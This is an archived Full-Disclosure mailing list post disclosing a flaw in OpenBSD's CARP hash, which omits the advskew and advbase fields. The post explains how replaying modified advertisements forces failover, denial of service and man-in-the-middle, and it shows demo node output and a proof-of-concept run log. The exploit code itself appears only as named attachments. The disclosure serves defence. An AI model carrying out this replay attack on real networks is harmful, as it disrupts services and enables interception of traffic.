lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Sat, 18 Dec 2010 15:08:05 +1300
From: Sam Banks <wolfie@...ogeny.ac.nz>
To: full-disclosure@...ts.grok.org.uk
Subject: OpenBSD CARP Hash Vulnerability

Hello FD,

I disclosed this bug to the BSDs and no one is interested in fixing it so
here you go. The two files attached are as follows:

* scapy-carp.patch - A patch against the latest Scapy (currently 2.1.0) so
it understands the CARP protocol. The PoC won't work without the patch
* carp-poc.py - A very quick and dirty PoC which will force all CARP nodes
into backup mode. You need to be on the same Layer 2 as the CARP nodes. Also
make sure you have the correct interface selected

Happy hacking,

wolfie

==============
VULNERABILITY DETAILS
==============

The OpenBSD CARP implementation (and all derivatives, such as FreeBSD and
NetBSD) fails to include all fields contained in the "carp_header"
structure[1] when calculating the SHA1 HMAC hash of the packet in the
function carp_proto_input_c[2]. The two 8-bit fields not included in the
hash generation are "carp_advskew" and "carp_advbase". Among other
functions, the fields are both set to 255 by the master CARP node to
indicate that it wants to step down from the master role.

This behaviour can be exploited to force a backup member to assume the role
of master by capturing a master CARP advertisement, updating the two fields
in question to 255 and replaying the modified packet. A backup node will
receive this packet and the hash check will be satisfied as the two modified
fields are not included in the hash generation. A backup node will now
assume the master role and the current master will step down to backup.

At this point, the attacker can now capture an advertisement from the new
master. By replaying both of the unmodified master advertisements, all CARP
nodes assume the backup role. At this point, a Denial of Service (DoS)
condition has been introduced as no device answers ARP requests for the
Virtual IP (VIP). The attacker can now decide whether to start answering ARP
for the VIP therefore performing a Man in the Middle (MitM) attack.

[1] http://www.openbsd.org/cgi-bin/cvsweb/src/sys/netinet/ip_carp.h?rev=1.28
[2]
http://www.openbsd.org/cgi-bin/cvsweb/src/sys/netinet/ip_carp.c?rev=1.179

================
DEMO OF ATTACHED CODE
================

---------------------------
MASTER CARP NODE
---------------------------
# uname -a; id
OpenBSD ipsec.carpdemo 4.8 GENERIC#136 i386
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty),
5(operator), 20(staff), 31(guest)
# ifconfig carp0 create carpdev vic0 pass supersecretpassword vhid 50 state
master carppeer 192.168.252.138 192.168.50.1/24
# ifconfig carp0
carp0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> mtu 1500
        lladdr 00:00:5e:00:01:32
        priority: 0
        carp: MASTER carpdev vic0 vhid 50 advbase 1 advskew 0 carppeer
192.168.252.138
        groups: carp
        status: master
        inet6 fe80::200:5eff:fe00:132%carp0 prefixlen 64 scopeid 0x5
        inet 192.168.50.1 netmask 0xffffff00 broadcast 192.168.50.255
# ifconfig carp0
carp0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> mtu 1500
        lladdr 00:00:5e:00:01:32
        priority: 0
        carp: BACKUP carpdev vic0 vhid 50 advbase 1 advskew 0 carppeer
192.168.252.138
        groups: carp
        status: backup
        inet6 fe80::200:5eff:fe00:132%carp0 prefixlen 64 scopeid 0x5
        inet 192.168.50.1 netmask 0xffffff00 broadcast 192.168.50.255
#

---------------------------
BACKUP CARP NODE
---------------------------

# uname -a; id
OpenBSD backdoor.carpdemo 4.8 GENERIC#136 i386
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty),
5(operator), 20(staff), 31(guest)
# ifconfig carp0 create carpdev vic0 pass supersecretpassword vhid 50 state
backup carppeer 192.168.252.137 192.168.50.1/24
# ifconfig carp0
carp0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> mtu 1500
        lladdr 00:00:5e:00:01:32
        priority: 0
        carp: BACKUP carpdev vic0 vhid 50 advbase 1 advskew 0 carppeer
192.168.252.137
        groups: carp
        status: backup
        inet6 fe80::200:5eff:fe00:132%carp0 prefixlen 64 scopeid 0x5
        inet 192.168.50.1 netmask 0xffffff00 broadcast 192.168.50.255
# ifconfig carp0
carp0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> mtu 1500
        lladdr 00:00:5e:00:01:32
        priority: 0
        carp: BACKUP carpdev vic0 vhid 50 advbase 1 advskew 0 carppeer
192.168.252.137
        groups: carp
        status: backup
        inet6 fe80::200:5eff:fe00:132%carp0 prefixlen 64 scopeid 0x5
        inet 192.168.50.1 netmask 0xffffff00 broadcast 192.168.50.255
#

------------------------------
ATTACKERS COMPUTER
------------------------------

root@...umatic:/files/tools# ./carp-poc.py
WARNING: No route found for IPv6 destination :: (no default route?)
[*] capturing current master's advertisement
[*] forcing failover of master
[*] waiting for new master to be elected
[*] capturing new master's advertisement
[*] replaying both captured packets

Content of type "text/html" skipped

View attachment "scapy-carp.patch" of type "text/x-patch" (2867 bytes)

View attachment "carp-poc.py" of type "text/x-python" (961 bytes)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ